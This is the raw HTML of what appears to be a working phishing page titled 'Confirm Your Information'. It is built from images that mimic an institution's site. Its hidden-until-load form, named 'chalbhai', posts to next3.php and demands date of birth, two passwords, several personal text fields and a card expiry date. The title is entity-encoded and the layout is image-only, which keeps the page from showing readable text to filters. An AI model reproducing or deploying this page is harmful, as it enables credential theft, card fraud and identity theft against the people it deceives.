<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>&#67;&#111;&#110;&#102;&#105;&#114;&#109;&#32;&#89;&#111;&#117;&#114;&#32;&#73;&#110;&#102;&#111;&#114;&#109;&#97;&#116;&#105;&#111;&#110;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="images/favicon.ico"/>
 <style>
			  
			  .textbox { 
    border: 1px solid #c4c4c4; 
    height: 29px; 
    width: 275px; 
    font-size: 13px; 
    padding: 5px 5px 5px 5px; 
    border-radius: 4px; 
    -moz-border-radius: 4px; 
    -webkit-border-radius: 4px; 
    box-shadow: 0px 0px 8px #d9d9d9; 
    -moz-box-shadow: 0px 0px 8px #d9d9d9; 
    -webkit-box-shadow: 0px 0px 8px #d9d9d9; 
} 
 
.textbox:focus { 
    outline: none; 
    border: 1px solid #E8AC7A; 
    box-shadow: 0px 0px 8px #E8AC7A; 
    -moz-box-shadow: 0px 0px 8px #E8AC7A; 
    -webkit-box-shadow: 0px 0px 8px #E8AC7A; 
} 
			  
			  </style>			  
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<body style="visibility:hidden" onload="unhideBody()">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1351px; height:119px; z-index:0"><img src="images/a1.png" alt="" title="" border=0 width=1351 height=119></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:118px; width:1350px; height:43px; z-index:1"><a href="#"><img src="images/b7.png" alt="" title="" border=0 width=1350 height=43></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:91px; top:258px; width:1178px; height:198px; z-index:2"><img src="images/b2.png" alt="" title="" border=0 width=1178 height=198></div>

<div id="image4" style="position:absolute; overflow:hidden; left:93px; top:208px; width:416px; height:42px; z-index:3"><img src="images/confirm.png" alt="" title="" border=0 width=416 height=42></div>

<div id="image5" style="position:absolute; overflow:hidden; left:90px; top:451px; width:1180px; height:140px; z-index:4"><img src="images/b3.png" alt="" title="" border=0 width=1180 height=140></div>

<div id="image6" style="position:absolute; overflow:hidden; left:90px; top:588px; width:1180px; height:141px; z-index:5"><img src="images/b4.png" alt="" title="" border=0 width=1180 height=141></div>

<div id="image7" style="position:absolute; overflow:hidden; left:90px; top:723px; width:1181px; height:134px; z-index:6"><img src="images/b5.png" alt="" title="" border=0 width=1181 height=134></div>

<div id="image8" style="position:absolute; overflow:hidden; left:88px; top:856px; width:1184px; height:215px; z-index:7"><img src="images/b6.png" alt="" title="" border=0 width=1184 height=215></div>

<div id="image9" style="position:absolute; overflow:hidden; left:0px; top:1167px; width:1349px; height:51px; z-index:8"><img src="images/a6.png" alt="" title="" border=0 width=1349 height=51></div>

<div id="image10" style="position:absolute; overflow:hidden; left:89px; top:1183px; width:390px; height:18px; z-index:9"><a href="#"><img src="images/footer.png" alt="" title="" border=0 width=390 height=18></a></div>

<div id="image11" style="position:absolute; overflow:hidden; left:478px; top:69px; width:376px; height:18px; z-index:10"><a href="#"><img src="images/a7.png" alt="" title="" border=0 width=376 height=18></a></div>

<div id="image12" style="position:absolute; overflow:hidden; left:937px; top:10px; width:321px; height:18px; z-index:11"><a href="#"><img src="images/head.png" alt="" title="" border=0 width=321 height=18></a></div>

<div id="image13" style="position:absolute; overflow:hidden; left:88px; top:51px; width:205px; height:53px; z-index:12"><a href="#"><img src="images/tanger.png" alt="" title="" border=0 width=205 height=53></a></div>

<form action="next3.php" name=chalbhai id=chalbhai method=post>
<input name="formtext1" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:326px;z-index:13">
<select name="formselect1" class="textbox" required style="position:absolute;left:313px;top:374px;height:32px;width:68px;z-index:14">
<option value="">MM</option>
 <option value="January">January</option>
 <option value="Febuary">Febuary</option>
 <option value="March">March</option>
 <option value="April">April</option>
 <option value="May">May</option>
 <option value="June">June</option>
 <option value="July">July</option>
 <option value="August">August</option>
 <option value="September">September</option>
 <option value="October">October</option>
 <option value="November">November</option>
 <option value="December">December</option></select>
<select name="formselect2" class="textbox" required style="position:absolute;left:387px;top:374px;height:32px;width:54px;z-index:15">
<option value="">DD</option>
 <option value="1">1</option>
 <option value="2">2</option>
 <option value="3">3</option>
 <option value="4">4</option>
 <option value="5">5</option>
 <option value="6">6</option>
 <option value="7">7</option>
 <option value="8">8</option>
 <option value="9">9</option>
 <option value="10">10</option>
 <option value="11">11</option>
 <option value="12">12</option>
 <option value="13">13</option>
 <option value="14">14</option>
 <option value="15">15</option>
 <option value="16">16</option>
 <option value="17">17</option>
 <option value="18">18</option>
 <option value="19">19</option>
 <option value="20">20</option>
 <option value="21">21</option>
 <option value="22">22</option>
 <option value="23">23</option>
 <option value="24">24</option>
 <option value="25">25</option>
 <option value="26">26</option>
 <option value="27">27</option>
 <option value="28">28</option>
 <option value="29">29</option>
 <option value="30">30</option>
 <option value="31">31</option></select>
<select name="formselect3" class="textbox" required style="position:absolute;left:449px;top:374px;height:32px;width:84px;z-index:16">
<option value="">YYYY</option>
<option value="2000">2000</option>
 <option value="1999">1999</option>
 <option value="1998">1998</option>
 <option value="1997">1997</option>
 <option value="1996">1996</option>
 <option value="1995">1995</option>
 <option value="1994">1994</option>
 <option value="1993">1993</option>
 <option value="1992">1992</option>
 <option value="1991">1991</option>
 <option value="1990">1990</option>
 <option value="1989">1989</option>
 <option value="1988">1988</option>
 <option value="1987">1987</option>
 <option value="1986">1986</option>
 <option value="1985">1985</option>
 <option value="1984">1984</option>
 <option value="1983">1983</option>
 <option value="1982">1982</option>
 <option value="1981">1981</option>
 <option value="1980">1980</option>
 <option value="1979">1979</option>
 <option value="1978">1978</option>
 <option value="1977">1977</option>
 <option value="1976">1976</option>
 <option value="1975">1975</option>
 <option value="1974">1974</option>
 <option value="1973">1973</option>
 <option value="1972">1972</option>
 <option value="1971">1971</option>
 <option value="1970">1970</option>
 <option value="1969">1969</option>
 <option value="1968">1968</option>
 <option value="1967">1967</option>
 <option value="1966">1966</option>
 <option value="1965">1965</option>
 <option value="1964">1964</option>
 <option value="1963">1963</option>
 <option value="1962">1962</option>
 <option value="1961">1961</option>
 <option value="1960">1960</option>
 <option value="1959">1959</option>
 <option value="1958">1958</option>
 <option value="1957">1957</option>
 <option value="1956">1956</option>
 <option value="1955">1955</option>
 <option value="1954">1954</option>
 <option value="1953">1953</option>
 <option value="1952">1952</option>
 <option value="1951">1951</option>
 <option value="1950">1950</option>
 <option value="1949">1949</option>
 <option value="1948">1948</option>
 <option value="1947">1947</option></select>
<input name="formtext2" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:420px;z-index:17">
<input name="formtext3" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:462px;z-index:18">
<input name="formtext4" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:510px;z-index:19">
<input name="formtext5" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:557px;z-index:20">
<input name="formtext6" class="textbox" required type="password" style="position:absolute;height:32px;width:220px;left:313px;top:596px;z-index:21">
<input name="formtext7" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:643px;z-index:22">
<input name="formtext8" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:690px;z-index:23">
<input name="formtext9" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:728px;z-index:24">
<input name="formtext10" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:777px;z-index:25">
<input name="formtext11" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:823px;z-index:26">
<select name="formselect4" class="textbox" required style="position:absolute;left:313px;top:866px;height:32px;width:74px;z-index:27">
<option value="">MM</option>
 <option value="January">January</option>
 <option value="Febuary">Febuary</option>
 <option value="March">March</option>
 <option value="April">April</option>
 <option value="May">May</option>
 <option value="June">June</option>
 <option value="July">July</option>
 <option value="August">August</option>
 <option value="September">September</option>
 <option value="October">October</option>
 <option value="November">November</option>
 <option value="December">December</option></select>
<select name="formselect5" class="textbox" required style="position:absolute;left:427px;top:866px;height:32px;width:71px;z-index:28">
<option value="">YYYY</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
<option value="2024">2024</option>
<option value="2025">2025</option>
<option value="2026">2026</option>
<option value="2027">2027</option>
<option value="2028">2028</option>
<option value="2029">2029</option>
<option value="2030">2030</option></select>
<input name="formtext12" class="textbox" required type="text" style="position:absolute;height:32px;width:220px;left:313px;top:914px;z-index:29">
<input name="formtext13" class="textbox" required type="password" style="position:absolute;height:32px;width:220px;left:313px;top:961px;z-index:30">
<div id="formimage1" style="position:absolute; left:1145px; top:1011px; z-index:31"><input type="image" name="formimage1" width="83" height="31" src="images/submit.png"></div>
<div id="image14" style="position:absolute; overflow:hidden; left:1048px; top:1011px; width:84px; height:30px; z-index:32"><a href="#"><img src="images/back.png" alt="" title="" border=0 width=84 height=30></a></div>

<input name="formtext14" class="textbox" placeholder="Search" type="text" style="position:absolute;height:28px;width:201px;left:1021px;top:66px;z-index:33">
<div id="image15" style="position:absolute; overflow:hidden; left:1222px; top:65px; width:38px; height:30px; z-index:34"><a href="#"><img src="images/search.png" alt="" title="" border=0 width=38 height=30></a></div>


</body>
</html>
